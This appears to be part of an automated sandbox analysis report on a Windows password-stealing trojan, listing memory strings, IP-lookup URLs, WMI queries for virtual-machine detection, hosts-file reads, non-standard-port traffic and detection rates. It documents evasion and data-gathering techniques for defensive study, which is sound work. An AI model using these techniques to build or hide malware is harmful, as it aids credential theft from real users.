Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabt
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: https://get.adob
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: https://helpx.ad
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp	String found in binary or memory: https://icanhazip.com
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp	String found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.260994800.0000000008210000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.260994800.0000000008210000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270731371.0000000002771000.00000004.00000001.sdmp	String found in binary or memory: https://wtfismyip.com/text
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275067190.00000000058AB000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.271024426.000000000286B000.00000004.00000001.sdmp, tmp2A87.tmp.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.269668764.000000000070A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_00408C60	1_2_00408C60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_0040DC11	1_2_0040DC11
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_00407C3F	1_2_00407C3F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_00418CCC	1_2_00418CCC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_00406CA0	1_2_00406CA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_004028B0	1_2_004028B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_0041A4BE	1_2_0041A4BE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_00418244	1_2_00418244
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_00401650	1_2_00401650
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_00402F20	1_2_00402F20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_004193C4	1_2_004193C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_00418788	1_2_00418788
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_00402F89	1_2_00402F89
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_00402B90	1_2_00402B90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_004073A0	1_2_004073A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_024F1638	1_2_024F1638
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_024FC9D0	1_2_024FC9D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_024FF2E0	1_2_024FF2E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_051008E3	1_2_051008E3

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Code function: String function: 0040E1D8 appears 44 times

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.278243802.00000000077B0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCloisters.exe4 vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.206914545.0000000000789000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename_.dll4 vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.278226031.00000000077A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.278274277.00000000077C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewmiutils.dll.muij% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.278368604.0000000007800000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.277892249.0000000006E50000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameaspnet_rc.dllT vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Binary or memory string: OriginalFilenameCloisters.exe4 vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, RELOCS_STRIPPED

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Static PE information: Section: .rsrc ZLIB complexity 0.988744491186

Source: classification engine

Classification label: mal88.troj.spyw.evad.winEXE@1/21@3/2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Code function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

1_2_004019F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

1_2_004019F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

File created: C:\Users\user\AppData\Local\Temp\tmp76A9.tmp

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Command line argument: 08A

1_2_00413780

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Virustotal: Detection: 74%
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Metadefender: Detection: 27%
Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	ReversingLabs: Detection: 75%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: _.pdb source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp

Data Obfuscation:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

1_2_004019F0

Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Static PE information: real checksum: 0x23bfb should be: 0x45256

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_0040E21D push ecx; ret	1_2_0040E230
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_024FD0C1 pushad ; iretd	1_2_024FD101
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Code function: 1_2_0510EC7A push 8B0876FFh; retf	1_2_0510EC7F

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 3214
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 3214
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 3214
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 3214 -> 49728

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

1_2_004019F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

